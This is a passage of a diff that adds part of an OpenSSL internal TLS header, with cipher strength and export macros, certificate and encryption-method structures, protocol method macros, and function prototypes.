+# define TLS1_PRF_MD5 (SSL_HANDSHAKE_MAC_MD5 << TLS1_PRF_DGST_SHIFT)
+# define TLS1_PRF_SHA1 (SSL_HANDSHAKE_MAC_SHA << TLS1_PRF_DGST_SHIFT)
+# define TLS1_PRF_SHA256 (SSL_HANDSHAKE_MAC_SHA256 << TLS1_PRF_DGST_SHIFT)
+# define TLS1_PRF_SHA384 (SSL_HANDSHAKE_MAC_SHA384 << TLS1_PRF_DGST_SHIFT)
+# define TLS1_PRF_GOST94 (SSL_HANDSHAKE_MAC_GOST94 << TLS1_PRF_DGST_SHIFT)
+# define TLS1_PRF (TLS1_PRF_MD5 | TLS1_PRF_SHA1)
+
+/*
+ * Stream MAC for GOST ciphersuites from cryptopro draft (currently this also
+ * goes into algorithm2)
+ */
+# define TLS1_STREAM_MAC 0x04
+
+/*
+ * Export and cipher strength information. For each cipher we have to decide
+ * whether it is exportable or not. This information is likely to change
+ * over time, since the export control rules are no static technical issue.
+ *
+ * Independent of the export flag the cipher strength is sorted into classes.
+ * SSL_EXP40 was denoting the 40bit US export limit of past times, which now
+ * is at 56bit (SSL_EXP56). If the exportable cipher class is going to change
+ * again (eg. to 64bit) the use of "SSL_EXP*" becomes blurred even more,
+ * since SSL_EXP64 could be similar to SSL_LOW.
+ * For this reason SSL_MICRO and SSL_MINI macros are included to widen the
+ * namespace of SSL_LOW-SSL_HIGH to lower values. As development of speed
+ * and ciphers goes, another extension to SSL_SUPER and/or SSL_ULTRA would
+ * be possible.
+ */
+# define SSL_EXP_MASK            0x00000003L
+# define SSL_STRONG_MASK         0x000001fcL
+
+# define SSL_NOT_EXP             0x00000001L
+# define SSL_EXPORT              0x00000002L
+
+# define SSL_STRONG_NONE         0x00000004L
+# define SSL_EXP40               0x00000008L
+# define SSL_MICRO               (SSL_EXP40)
+# define SSL_EXP56               0x00000010L
+# define SSL_MINI                (SSL_EXP56)
+# define SSL_LOW                 0x00000020L
+# define SSL_MEDIUM              0x00000040L
+# define SSL_HIGH                0x00000080L
+# define SSL_FIPS                0x00000100L
+
+/* we have used 000001ff - 23 bits left to go */
+
+/*-
+ * Macros to check the export status and cipher strength for export ciphers.
+ * Even though the macros for EXPORT and EXPORT40/56 have similar names,
+ * their meaning is different:
+ * *_EXPORT macros check the 'exportable' status.
+ * *_EXPORT40/56 macros are used to check whether a certain cipher strength
+ *          is given.
+ * Since the SSL_IS_EXPORT* and SSL_EXPORT* macros depend on the correct
+ * algorithm structure element to be passed (algorithms, algo_strength) and no
+ * typechecking can be done as they are all of type unsigned long, their
+ * direct usage is discouraged.
+ * Use the SSL_C_* macros instead.
+ */
+# define SSL_IS_EXPORT(a)        ((a)&SSL_EXPORT)
+# define SSL_IS_EXPORT56(a)      ((a)&SSL_EXP56)
+# define SSL_IS_EXPORT40(a)      ((a)&SSL_EXP40)
+# define SSL_C_IS_EXPORT(c)      SSL_IS_EXPORT((c)->algo_strength)
+# define SSL_C_IS_EXPORT56(c)    SSL_IS_EXPORT56((c)->algo_strength)
+# define SSL_C_IS_EXPORT40(c)    SSL_IS_EXPORT40((c)->algo_strength)
+
+# define SSL_EXPORT_KEYLENGTH(a,s)       (SSL_IS_EXPORT40(s) ? 5 : \
+                                 (a) == SSL_DES ? 8 : 7)
+# define SSL_EXPORT_PKEYLENGTH(a) (SSL_IS_EXPORT40(a) ? 512 : 1024)
+# define SSL_C_EXPORT_KEYLENGTH(c)       SSL_EXPORT_KEYLENGTH((c)->algorithm_enc, \
+                                (c)->algo_strength)
+# define SSL_C_EXPORT_PKEYLENGTH(c)      SSL_EXPORT_PKEYLENGTH((c)->algo_strength)
+
+/* Check if an SSL structure is using DTLS */
+# define SSL_IS_DTLS(s)  (s->method->ssl3_enc->enc_flags & SSL_ENC_FLAG_DTLS)
+/* See if we need explicit IV */
+# define SSL_USE_EXPLICIT_IV(s)  \
+                (s->method->ssl3_enc->enc_flags & SSL_ENC_FLAG_EXPLICIT_IV)
+/*
+ * See if we use signature algorithms extension and signature algorithm
+ * before signatures.
+ */
+# define SSL_USE_SIGALGS(s)      \
+                        (s->method->ssl3_enc->enc_flags & SSL_ENC_FLAG_SIGALGS)
+/*
+ * Allow TLS 1.2 ciphersuites: applies to DTLS 1.2 as well as TLS 1.2: may
+ * apply to others in future.
+ */
+# define SSL_USE_TLS1_2_CIPHERS(s)       \
+                (s->method->ssl3_enc->enc_flags & SSL_ENC_FLAG_TLS1_2_CIPHERS)
+/*
+ * Determine if a client can use TLS 1.2 ciphersuites: can't rely on method
+ * flags because it may not be set to correct version yet.
+ */
+# define SSL_CLIENT_USE_TLS1_2_CIPHERS(s)        \
+                ((SSL_IS_DTLS(s) && s->client_version <= DTLS1_2_VERSION) || \
+                (!SSL_IS_DTLS(s) && s->client_version >= TLS1_2_VERSION))
+
+/* Mostly for SSLv3 */
+# define SSL_PKEY_RSA_ENC        0
+# define SSL_PKEY_RSA_SIGN       1
+# define SSL_PKEY_DSA_SIGN       2
+# define SSL_PKEY_DH_RSA         3
+# define SSL_PKEY_DH_DSA         4
+# define SSL_PKEY_ECC            5
+# define SSL_PKEY_GOST94         6
+# define SSL_PKEY_GOST01         7
+# define SSL_PKEY_NUM            8
+
+/*-
+ * SSL_kRSA <- RSA_ENC | (RSA_TMP & RSA_SIGN) |
+ *          <- (EXPORT & (RSA_ENC | RSA_TMP) & RSA_SIGN)
+ * SSL_kDH  <- DH_ENC & (RSA_ENC | RSA_SIGN | DSA_SIGN)
+ * SSL_kEDH <- RSA_ENC | RSA_SIGN | DSA_SIGN
+ * SSL_aRSA <- RSA_ENC | RSA_SIGN
+ * SSL_aDSS <- DSA_SIGN
+ */
+
+/*-
+#define CERT_INVALID            0
+#define CERT_PUBLIC_KEY         1
+#define CERT_PRIVATE_KEY        2
+*/
+
+# ifndef OPENSSL_NO_EC
+/*
+ * From ECC-TLS draft, used in encoding the curve type in ECParameters
+ */
+#  define EXPLICIT_PRIME_CURVE_TYPE  1
+#  define EXPLICIT_CHAR2_CURVE_TYPE  2
+#  define NAMED_CURVE_TYPE           3
+# endif                         /* OPENSSL_NO_EC */
+
+typedef struct cert_pkey_st {
+    X509 *x509;
+    EVP_PKEY *privatekey;
+    /* Digest to use when signing */
+    const EVP_MD *digest;
+    /* Chain for this certificate */
+    STACK_OF(X509) *chain;
+# ifndef OPENSSL_NO_TLSEXT
+    /*-
+     * serverinfo data for this certificate.  The data is in TLS Extension
+     * wire format, specifically it's a series of records like:
+     *   uint16_t extension_type; // (RFC 5246, 7.4.1.4, Extension)
+     *   uint16_t length;
+     *   uint8_t data[length];
+     */
+    unsigned char *serverinfo;
+    size_t serverinfo_length;
+# endif
+    /*
+     * Set if CERT_PKEY can be used with current SSL session: e.g.
+     * appropriate curve, signature algorithms etc. If zero it can't be used
+     * at all.
+     */
+    int valid_flags;
+} CERT_PKEY;
+/* Retrieve Suite B flags */
+# define tls1_suiteb(s)  (s->cert->cert_flags & SSL_CERT_FLAG_SUITEB_128_LOS)
+/* Uses to check strict mode: suite B modes are always strict */
+# define SSL_CERT_FLAGS_CHECK_TLS_STRICT \
+        (SSL_CERT_FLAG_SUITEB_128_LOS|SSL_CERT_FLAG_TLS_STRICT)
+
+typedef struct {
+    unsigned short ext_type;
+    /*
+     * Per-connection flags relating to this extension type: not used if
+     * part of an SSL_CTX structure.
+     */
+    unsigned short ext_flags;
+    custom_ext_add_cb add_cb;
+    custom_ext_free_cb free_cb;
+    void *add_arg;
+    custom_ext_parse_cb parse_cb;
+    void *parse_arg;
+} custom_ext_method;
+
+/* ext_flags values */
+
+/*
+ * Indicates an extension has been received. Used to check for unsolicited or
+ * duplicate extensions.
+ */
+# define SSL_EXT_FLAG_RECEIVED   0x1
+/*
+ * Indicates an extension has been sent: used to enable sending of
+ * corresponding ServerHello extension.
+ */
+# define SSL_EXT_FLAG_SENT       0x2
+
+typedef struct {
+    custom_ext_method *meths;
+    size_t meths_count;
+} custom_ext_methods;
+
+typedef struct cert_st {
+    /* Current active set */
+    /*
+     * ALWAYS points to an element of the pkeys array
+     * Probably it would make more sense to store
+     * an index, not a pointer.
+     */
+    CERT_PKEY *key;
+    /*
+     * For servers the following masks are for the key and auth algorithms
+     * that are supported by the certs below. For clients they are masks of
+     * *disabled* algorithms based on the current session.
+     */
+    int valid;
+    unsigned long mask_k;
+    unsigned long mask_a;
+    unsigned long export_mask_k;
+    unsigned long export_mask_a;
+    /* Client only */
+    unsigned long mask_ssl;
+# ifndef OPENSSL_NO_RSA
+    RSA *rsa_tmp;
+    RSA *(*rsa_tmp_cb) (SSL *ssl, int is_export, int keysize);
+# endif
+# ifndef OPENSSL_NO_DH
+    DH *dh_tmp;
+    DH *(*dh_tmp_cb) (SSL *ssl, int is_export, int keysize);
+# endif
+# ifndef OPENSSL_NO_ECDH
+    EC_KEY *ecdh_tmp;
+    /* Callback for generating ephemeral ECDH keys */
+    EC_KEY *(*ecdh_tmp_cb) (SSL *ssl, int is_export, int keysize);
+    /* Select ECDH parameters automatically */
+    int ecdh_tmp_auto;
+# endif
+    /* Flags related to certificates */
+    unsigned int cert_flags;
+    CERT_PKEY pkeys[SSL_PKEY_NUM];
+    /*
+     * Certificate types (received or sent) in certificate request message.
+     * On receive this is only set if number of certificate types exceeds
+     * SSL3_CT_NUMBER.
+     */
+    unsigned char *ctypes;
+    size_t ctype_num;
+    /*
+     * signature algorithms peer reports: e.g. supported signature algorithms
+     * extension for server or as part of a certificate request for client.
+     */
+    unsigned char *peer_sigalgs;
+    /* Size of above array */
+    size_t peer_sigalgslen;
+    /*
+     * suppported signature algorithms. When set on a client this is sent in
+     * the client hello as the supported signature algorithms extension. For
+     * servers it represents the signature algorithms we are willing to use.
+     */
+    unsigned char *conf_sigalgs;
+    /* Size of above array */
+    size_t conf_sigalgslen;
+    /*
+     * Client authentication signature algorithms, if not set then uses
+     * conf_sigalgs. On servers these will be the signature algorithms sent
+     * to the client in a cerificate request for TLS 1.2. On a client this
+     * represents the signature algortithms we are willing to use for client
+     * authentication.
+     */
+    unsigned char *client_sigalgs;
+    /* Size of above array */
+    size_t client_sigalgslen;
+    /*
+     * Signature algorithms shared by client and server: cached because these
+     * are used most often.
+     */
+    TLS_SIGALGS *shared_sigalgs;
+    size_t shared_sigalgslen;
+    /*
+     * Certificate setup callback: if set is called whenever a certificate
+     * may be required (client or server). the callback can then examine any
+     * appropriate parameters and setup any certificates required. This
+     * allows advanced applications to select certificates on the fly: for
+     * example based on supported signature algorithms or curves.
+     */
+    int (*cert_cb) (SSL *ssl, void *arg);
+    void *cert_cb_arg;
+    /*
+     * Optional X509_STORE for chain building or certificate validation If
+     * NULL the parent SSL_CTX store is used instead.
+     */
+    X509_STORE *chain_store;
+    X509_STORE *verify_store;
+    /* Raw values of the cipher list from a client */
+    unsigned char *ciphers_raw;
+    size_t ciphers_rawlen;
+    /* Custom extension methods for server and client */
+    custom_ext_methods cli_ext;
+    custom_ext_methods srv_ext;
+    int references;             /* >1 only if SSL_copy_session_id is used */
+} CERT;
+
+typedef struct sess_cert_st {
+    STACK_OF(X509) *cert_chain; /* as received from peer (not for SSL2) */
+    /* The 'peer_...' members are used only by clients. */
+    int peer_cert_type;
+    CERT_PKEY *peer_key;        /* points to an element of peer_pkeys (never
+                                 * NULL!) */
+    CERT_PKEY peer_pkeys[SSL_PKEY_NUM];
+    /*
+     * Obviously we don't have the private keys of these, so maybe we
+     * shouldn't even use the CERT_PKEY type here.
+     */
+# ifndef OPENSSL_NO_RSA
+    RSA *peer_rsa_tmp;          /* not used for SSL 2 */
+# endif
+# ifndef OPENSSL_NO_DH
+    DH *peer_dh_tmp;            /* not used for SSL 2 */
+# endif
+# ifndef OPENSSL_NO_ECDH
+    EC_KEY *peer_ecdh_tmp;
+# endif
+    int references;             /* actually always 1 at the moment */
+} SESS_CERT;
+/* Structure containing decoded values of signature algorithms extension */
+struct tls_sigalgs_st {
+    /* NID of hash algorithm */
+    int hash_nid;
+    /* NID of signature algorithm */
+    int sign_nid;
+    /* Combined hash and signature NID */
+    int signandhash_nid;
+    /* Raw values used in extension */
+    unsigned char rsign;
+    unsigned char rhash;
+};
+
+/*
+ * #define MAC_DEBUG
+ */
+
+/*
+ * #define ERR_DEBUG
+ */
+/*
+ * #define ABORT_DEBUG
+ */
+/*
+ * #define PKT_DEBUG 1
+ */
+/*
+ * #define DES_DEBUG
+ */
+/*
+ * #define DES_OFB_DEBUG
+ */
+/*
+ * #define SSL_DEBUG
+ */
+/*
+ * #define RSA_DEBUG
+ */
+/*
+ * #define IDEA_DEBUG
+ */
+
+# define FP_ICC  (int (*)(const void *,const void *))
+# define ssl_put_cipher_by_char(ssl,ciph,ptr) \
+                ((ssl)->method->put_cipher_by_char((ciph),(ptr)))
+
+/*
+ * This is for the SSLv3/TLSv1.0 differences in crypto/hash stuff It is a bit
+ * of a mess of functions, but hell, think of it as an opaque structure :-)
+ */
+typedef struct ssl3_enc_method {
+    int (*enc) (SSL *, int);
+    int (*mac) (SSL *, unsigned char *, int);
+    int (*setup_key_block) (SSL *);
+    int (*generate_master_secret) (SSL *, unsigned char *, unsigned char *,
+                                   int);
+    int (*change_cipher_state) (SSL *, int);
+    int (*final_finish_mac) (SSL *, const char *, int, unsigned char *);
+    int finish_mac_length;
+    int (*cert_verify_mac) (SSL *, int, unsigned char *);
+    const char *client_finished_label;
+    int client_finished_label_len;
+    const char *server_finished_label;
+    int server_finished_label_len;
+    int (*alert_value) (int);
+    int (*export_keying_material) (SSL *, unsigned char *, size_t,
+                                   const char *, size_t,
+                                   const unsigned char *, size_t,
+                                   int use_context);
+    /* Various flags indicating protocol version requirements */
+    unsigned int enc_flags;
+    /* Handshake header length */
+    unsigned int hhlen;
+    /* Set the handshake header */
+    void (*set_handshake_header) (SSL *s, int type, unsigned long len);
+    /* Write out handshake message */
+    int (*do_write) (SSL *s);
+} SSL3_ENC_METHOD;
+
+# define SSL_HM_HEADER_LENGTH(s) s->method->ssl3_enc->hhlen
+# define ssl_handshake_start(s) \
+        (((unsigned char *)s->init_buf->data) + s->method->ssl3_enc->hhlen)
+# define ssl_set_handshake_header(s, htype, len) \
+        s->method->ssl3_enc->set_handshake_header(s, htype, len)
+# define ssl_do_write(s)  s->method->ssl3_enc->do_write(s)
+
+/* Values for enc_flags */
+
+/* Uses explicit IV for CBC mode */
+# define SSL_ENC_FLAG_EXPLICIT_IV        0x1
+/* Uses signature algorithms extension */
+# define SSL_ENC_FLAG_SIGALGS            0x2
+/* Uses SHA256 default PRF */
+# define SSL_ENC_FLAG_SHA256_PRF         0x4
+/* Is DTLS */
+# define SSL_ENC_FLAG_DTLS               0x8
+/*
+ * Allow TLS 1.2 ciphersuites: applies to DTLS 1.2 as well as TLS 1.2: may
+ * apply to others in future.
+ */
+# define SSL_ENC_FLAG_TLS1_2_CIPHERS     0x10
+
+# ifndef OPENSSL_NO_COMP
+/* Used for holding the relevant compression methods loaded into SSL_CTX */
+typedef struct ssl3_comp_st {
+    int comp_id;                /* The identifier byte for this compression
+                                 * type */
+    char *name;                 /* Text name used for the compression type */
+    COMP_METHOD *method;        /* The method :-) */
+} SSL3_COMP;
+# endif
+
+# ifndef OPENSSL_NO_BUF_FREELISTS
+typedef struct ssl3_buf_freelist_st {
+    size_t chunklen;
+    unsigned int len;
+    struct ssl3_buf_freelist_entry_st *head;
+} SSL3_BUF_FREELIST;
+
+typedef struct ssl3_buf_freelist_entry_st {
+    struct ssl3_buf_freelist_entry_st *next;
+} SSL3_BUF_FREELIST_ENTRY;
+# endif
+
+extern SSL3_ENC_METHOD ssl3_undef_enc_method;
+OPENSSL_EXTERN const SSL_CIPHER ssl2_ciphers[];
+OPENSSL_EXTERN SSL_CIPHER ssl3_ciphers[];
+
+SSL_METHOD *ssl_bad_method(int ver);
+
+extern SSL3_ENC_METHOD TLSv1_enc_data;
+extern SSL3_ENC_METHOD TLSv1_1_enc_data;
+extern SSL3_ENC_METHOD TLSv1_2_enc_data;
+extern SSL3_ENC_METHOD SSLv3_enc_data;
+extern SSL3_ENC_METHOD DTLSv1_enc_data;
+extern SSL3_ENC_METHOD DTLSv1_2_enc_data;
+
+# define IMPLEMENT_tls_meth_func(version, func_name, s_accept, s_connect, \
+                                s_get_meth, enc_data) \
+const SSL_METHOD *func_name(void)  \
+        { \
+        static const SSL_METHOD func_name##_data= { \
+                version, \
+                tls1_new, \
+                tls1_clear, \
+                tls1_free, \
+                s_accept, \
+                s_connect, \
+                ssl3_read, \
+                ssl3_peek, \
+                ssl3_write, \
+                ssl3_shutdown, \
+                ssl3_renegotiate, \
+                ssl3_renegotiate_check, \
+                ssl3_get_message, \
+                ssl3_read_bytes, \
+                ssl3_write_bytes, \
+                ssl3_dispatch_alert, \
+                ssl3_ctrl, \
+                ssl3_ctx_ctrl, \
+                ssl3_get_cipher_by_char, \
+                ssl3_put_cipher_by_char, \
+                ssl3_pending, \
+                ssl3_num_ciphers, \
+                ssl3_get_cipher, \
+                s_get_meth, \
+                tls1_default_timeout, \
+                &enc_data, \
+                ssl_undefined_void_function, \
+                ssl3_callback_ctrl, \
+                ssl3_ctx_callback_ctrl, \
+        }; \
+        return &func_name##_data; \
+        }
+
+# define IMPLEMENT_ssl3_meth_func(func_name, s_accept, s_connect, s_get_meth) \
+const SSL_METHOD *func_name(void)  \
+        { \
+        static const SSL_METHOD func_name##_data= { \
+                SSL3_VERSION, \
+                ssl3_new, \
+                ssl3_clear, \
+                ssl3_free, \
+                s_accept, \
+                s_connect, \
+                ssl3_read, \
+                ssl3_peek, \
+                ssl3_write, \
+                ssl3_shutdown, \
+                ssl3_renegotiate, \
+                ssl3_renegotiate_check, \
+                ssl3_get_message, \
+                ssl3_read_bytes, \
+                ssl3_write_bytes, \
+                ssl3_dispatch_alert, \
+                ssl3_ctrl, \
+                ssl3_ctx_ctrl, \
+                ssl3_get_cipher_by_char, \
+                ssl3_put_cipher_by_char, \
+                ssl3_pending, \
+                ssl3_num_ciphers, \
+                ssl3_get_cipher, \
+                s_get_meth, \
+                ssl3_default_timeout, \
+                &SSLv3_enc_data, \
+                ssl_undefined_void_function, \
+                ssl3_callback_ctrl, \
+                ssl3_ctx_callback_ctrl, \
+        }; \
+        return &func_name##_data; \
+        }
+
+# define IMPLEMENT_ssl23_meth_func(func_name, s_accept, s_connect, s_get_meth) \
+const SSL_METHOD *func_name(void)  \
+        { \
+        static const SSL_METHOD func_name##_data= { \
+        TLS1_2_VERSION, \
+        tls1_new, \
+        tls1_clear, \
+        tls1_free, \
+        s_accept, \
+        s_connect, \
+        ssl23_read, \
+        ssl23_peek, \
+        ssl23_write, \
+        ssl_undefined_function, \
+        ssl_undefined_function, \
+        ssl_ok, \
+        ssl3_get_message, \
+        ssl3_read_bytes, \
+        ssl3_write_bytes, \
+        ssl3_dispatch_alert, \
+        ssl3_ctrl, \
+        ssl3_ctx_ctrl, \
+        ssl23_get_cipher_by_char, \
+        ssl23_put_cipher_by_char, \
+        ssl_undefined_const_function, \
+        ssl23_num_ciphers, \
+        ssl23_get_cipher, \
+        s_get_meth, \
+        ssl23_default_timeout, \
+        &TLSv1_2_enc_data, \
+        ssl_undefined_void_function, \
+        ssl3_callback_ctrl, \
+        ssl3_ctx_callback_ctrl, \
+        }; \
+        return &func_name##_data; \
+        }
+
+# define IMPLEMENT_ssl2_meth_func(func_name, s_accept, s_connect, s_get_meth) \
+const SSL_METHOD *func_name(void)  \
+        { \
+        static const SSL_METHOD func_name##_data= { \
+                SSL2_VERSION, \
+                ssl2_new,       /* local */ \
+                ssl2_clear,     /* local */ \
+                ssl2_free,      /* local */ \
+                s_accept, \
+                s_connect, \
+                ssl2_read, \
+                ssl2_peek, \
+                ssl2_write, \
+                ssl2_shutdown, \
+                ssl_ok, /* NULL - renegotiate */ \
+                ssl_ok, /* NULL - check renegotiate */ \
+                NULL, /* NULL - ssl_get_message */ \
+                NULL, /* NULL - ssl_get_record */ \
+                NULL, /* NULL - ssl_write_bytes */ \
+                NULL, /* NULL - dispatch_alert */ \
+                ssl2_ctrl,      /* local */ \
+                ssl2_ctx_ctrl,  /* local */ \
+                ssl2_get_cipher_by_char, \
+                ssl2_put_cipher_by_char, \
+                ssl2_pending, \
+                ssl2_num_ciphers, \
+                ssl2_get_cipher, \
+                s_get_meth, \
+                ssl2_default_timeout, \
+                &ssl3_undef_enc_method, \
+                ssl_undefined_void_function, \
+                ssl2_callback_ctrl,     /* local */ \
+                ssl2_ctx_callback_ctrl, /* local */ \
+        }; \
+        return &func_name##_data; \
+        }
+
+# define IMPLEMENT_dtls1_meth_func(version, func_name, s_accept, s_connect, \
+                                        s_get_meth, enc_data) \
+const SSL_METHOD *func_name(void)  \
+        { \
+        static const SSL_METHOD func_name##_data= { \
+                version, \
+                dtls1_new, \
+                dtls1_clear, \
+                dtls1_free, \
+                s_accept, \
+                s_connect, \
+                ssl3_read, \
+                ssl3_peek, \
+                ssl3_write, \
+                dtls1_shutdown, \
+                ssl3_renegotiate, \
+                ssl3_renegotiate_check, \
+                dtls1_get_message, \
+                dtls1_read_bytes, \
+                dtls1_write_app_data_bytes, \
+                dtls1_dispatch_alert, \
+                dtls1_ctrl, \
+                ssl3_ctx_ctrl, \
+                ssl3_get_cipher_by_char, \
+                ssl3_put_cipher_by_char, \
+                ssl3_pending, \
+                ssl3_num_ciphers, \
+                dtls1_get_cipher, \
+                s_get_meth, \
+                dtls1_default_timeout, \
+                &enc_data, \
+                ssl_undefined_void_function, \
+                ssl3_callback_ctrl, \
+                ssl3_ctx_callback_ctrl, \
+        }; \
+        return &func_name##_data; \
+        }
+
+struct openssl_ssl_test_functions {
+    int (*p_ssl_init_wbio_buffer) (SSL *s, int push);
+    int (*p_ssl3_setup_buffers) (SSL *s);
+    int (*p_tls1_process_heartbeat) (SSL *s);
+    int (*p_dtls1_process_heartbeat) (SSL *s);
+};
+
+# ifndef OPENSSL_UNIT_TEST
+
+void ssl_clear_cipher_ctx(SSL *s);
+int ssl_clear_bad_session(SSL *s);
+CERT *ssl_cert_new(void);
+CERT *ssl_cert_dup(CERT *cert);
+void ssl_cert_set_default_md(CERT *cert);
+int ssl_cert_inst(CERT **o);
+void ssl_cert_clear_certs(CERT *c);
+void ssl_cert_free(CERT *c);
+SESS_CERT *ssl_sess_cert_new(void);
+void ssl_sess_cert_free(SESS_CERT *sc);
+int ssl_set_peer_cert_type(SESS_CERT *c, int type);
+int ssl_get_new_session(SSL *s, int session);
+int ssl_get_prev_session(SSL *s, unsigned char *session, int len,
+                         const unsigned char *limit);
+int ssl_cipher_id_cmp(const SSL_CIPHER *a, const SSL_CIPHER *b);
+DECLARE_OBJ_BSEARCH_GLOBAL_CMP_FN(SSL_CIPHER, SSL_CIPHER, ssl_cipher_id);
+int ssl_cipher_ptr_id_cmp(const SSL_CIPHER *const *ap,
+                          const SSL_CIPHER *const *bp);
+STACK_OF(SSL_CIPHER) *ssl_bytes_to_cipher_list(SSL *s, unsigned char *p,
+                                               int num,
+                                               STACK_OF(SSL_CIPHER) **skp);
+int ssl_cipher_list_to_bytes(SSL *s, STACK_OF(SSL_CIPHER) *sk,
+                             unsigned char *p,
+                             int (*put_cb) (const SSL_CIPHER *,
+                                            unsigned char *));
+STACK_OF(SSL_CIPHER) *ssl_create_cipher_list(const SSL_METHOD *meth,
+                                             STACK_OF(SSL_CIPHER) **pref,
+                                             STACK_OF(SSL_CIPHER) **sorted,
+                                             const char *rule_str, CERT *c);
+void ssl_update_cache(SSL *s, int mode);
+int ssl_cipher_get_evp(const SSL_SESSION *s, const EVP_CIPHER **enc,
+                       const EVP_MD **md, int *mac_pkey_type,
+                       int *mac_secret_size, SSL_COMP **comp);
+int ssl_get_handshake_digest(int i, long *mask, const EVP_MD **md);
+int ssl_cipher_get_cert_index(const SSL_CIPHER *c);
+const SSL_CIPHER *ssl_get_cipher_by_char(SSL *ssl, const unsigned char *ptr);
+int ssl_cert_set0_chain(CERT *c, STACK_OF(X509) *chain);
+int ssl_cert_set1_chain(CERT *c, STACK_OF(X509) *chain);
+int ssl_cert_add0_chain_cert(CERT *c, X509 *x);
+int ssl_cert_add1_chain_cert(CERT *c, X509 *x);
+int ssl_cert_select_current(CERT *c, X509 *x);
+int ssl_cert_set_current(CERT *c, long arg);
+X509 *ssl_cert_get0_next_certificate(CERT *c, int first);
+void ssl_cert_set_cert_cb(CERT *c, int (*cb) (SSL *ssl, void *arg),
+                          void *arg);
+
+int ssl_verify_cert_chain(SSL *s, STACK_OF(X509) *sk);
+int ssl_add_cert_chain(SSL *s, CERT_PKEY *cpk, unsigned long *l);
+int ssl_build_cert_chain(CERT *c, X509_STORE *chain_store, int flags);
+int ssl_cert_set_cert_store(CERT *c, X509_STORE *store, int chain, int ref);
+int ssl_undefined_function(SSL *s);
+int ssl_undefined_void_function(void);
+int ssl_undefined_const_function(const SSL *s);
+CERT_PKEY *ssl_get_server_send_pkey(const SSL *s);
+#  ifndef OPENSSL_NO_TLSEXT
+int ssl_get_server_cert_serverinfo(SSL *s, const unsigned char **serverinfo,
+                                   size_t *serverinfo_length);
+#  endif
+EVP_PKEY *ssl_get_sign_pkey(SSL *s, const SSL_CIPHER *c, const EVP_MD **pmd);
+int ssl_cert_type(X509 *x, EVP_PKEY *pkey);
+void ssl_set_cert_masks(CERT *c, const SSL_CIPHER *cipher);
+STACK_OF(SSL_CIPHER) *ssl_get_ciphers_by_id(SSL *s);
+int ssl_verify_alarm_type(long type);
+void ssl_load_ciphers(void);
+int ssl_fill_hello_random(SSL *s, int server, unsigned char *field, int len);
+
+int ssl2_enc_init(SSL *s, int client);
+int ssl2_generate_key_material(SSL *s);
+int ssl2_enc(SSL *s, int send_data);
+void ssl2_mac(SSL *s, unsigned char *mac, int send_data);
+const SSL_CIPHER *ssl2_get_cipher_by_char(const unsigned char *p);
+int ssl2_put_cipher_by_char(const SSL_CIPHER *c, unsigned char *p);
+int ssl2_part_read(SSL *s, unsigned long f, int i);
+int ssl2_do_write(SSL *s);
+int ssl2_set_certificate(SSL *s, int type, int len,
+                         const unsigned char *data);
+void ssl2_return_error(SSL *s, int reason);
+void ssl2_write_error(SSL *s);
+int ssl2_num_ciphers(void);
+const SSL_CIPHER *ssl2_get_cipher(unsigned int u);
+int ssl2_new(SSL *s);
+void ssl2_free(SSL *s);
+int ssl2_accept(SSL *s);
+int ssl2_connect(SSL *s);
+int ssl2_read(SSL *s, void *buf, int len);
+int ssl2_peek(SSL *s, void *buf, int len);
+int ssl2_write(SSL *s, const void *buf, int len);
+int ssl2_shutdown(SSL *s);
+void ssl2_clear(SSL *s);
+long ssl2_ctrl(SSL *s, int cmd, long larg, void *parg);
+long ssl2_ctx_ctrl(SSL_CTX *s, int cmd, long larg, void *parg);
+long ssl2_callback_ctrl(SSL *s, int cmd, void (*fp) (void));
+long ssl2_ctx_callback_ctrl(SSL_CTX *s, int cmd, void (*fp) (void));
+int ssl2_pending(const SSL *s);
+long ssl2_default_timeout(void);
+
+const SSL_CIPHER *ssl3_get_cipher_by_char(const unsigned char *p);
+int ssl3_put_cipher_by_char(const SSL_CIPHER *c, unsigned char *p);
+void ssl3_init_finished_mac(SSL *s);
+int ssl3_send_server_certificate(SSL *s);
+int ssl3_send_newsession_ticket(SSL *s);
+int ssl3_send_cert_status(SSL *s);
+int ssl3_get_finished(SSL *s, int state_a, int state_b);
+int ssl3_setup_key_block(SSL *s);
+int ssl3_send_change_cipher_spec(SSL *s, int state_a, int state_b);
+int ssl3_change_cipher_state(SSL *s, int which);
+void ssl3_cleanup_key_block(SSL *s);
+int ssl3_do_write(SSL *s, int type);
+int ssl3_send_alert(SSL *s, int level, int desc);
+int ssl3_generate_master_secret(SSL *s, unsigned char *out,
+                                unsigned char *p, int len);
+int ssl3_get_req_cert_type(SSL *s, unsigned char *p);
+long ssl3_get_message(SSL *s, int st1, int stn, int mt, long max, int *ok);
+int ssl3_send_finished(SSL *s, int a, int b, const char *sender, int slen);
+int ssl3_num_ciphers(void);
+const SSL_CIPHER *ssl3_get_cipher(unsigned int u);
+int ssl3_renegotiate(SSL *ssl);
+int ssl3_renegotiate_check(SSL *ssl);
+int ssl3_dispatch_alert(SSL *s);
+int ssl3_read_bytes(SSL *s, int type, unsigned char *buf, int len, int peek);
+int ssl3_write_bytes(SSL *s, int type, const void *buf, int len);
+int ssl3_final_finish_mac(SSL *s, const char *sender, int slen,
+                          unsigned char *p);
+int ssl3_cert_verify_mac(SSL *s, int md_nid, unsigned char *p);
+void ssl3_finish_mac(SSL *s, const unsigned char *buf, int len);
+int ssl3_enc(SSL *s, int send_data);
+int n_ssl3_mac(SSL *ssl, unsigned char *md, int send_data);
+void ssl3_free_digest_list(SSL *s);
+unsigned long ssl3_output_cert_chain(SSL *s, CERT_PKEY *cpk);
+SSL_CIPHER *ssl3_choose_cipher(SSL *ssl, STACK_OF(SSL_CIPHER) *clnt,
+                               STACK_OF(SSL_CIPHER) *srvr);
+int ssl3_setup_buffers(SSL *s);
+int ssl3_setup_read_buffer(SSL *s);
+int ssl3_setup_write_buffer(SSL *s);
+int ssl3_release_read_buffer(SSL *s);
+int ssl3_release_write_buffer(SSL *s);
+int ssl3_digest_cached_records(SSL *s);
+int ssl3_new(SSL *s);
+void ssl3_free(SSL *s);
+int ssl3_accept(SSL *s);
+int ssl3_connect(SSL *s);
+int ssl3_read(SSL *s, void *buf, int len);
+int ssl3_peek(SSL *s, void *buf, int len);
+int ssl3_write(SSL *s, const void *buf, int len);
+int ssl3_shutdown(SSL *s);
+void ssl3_clear(SSL *s);
+long ssl3_ctrl(SSL *s, int cmd, long larg, void *parg);
+long ssl3_ctx_ctrl(SSL_CTX *s, int cmd, long larg, void *parg);
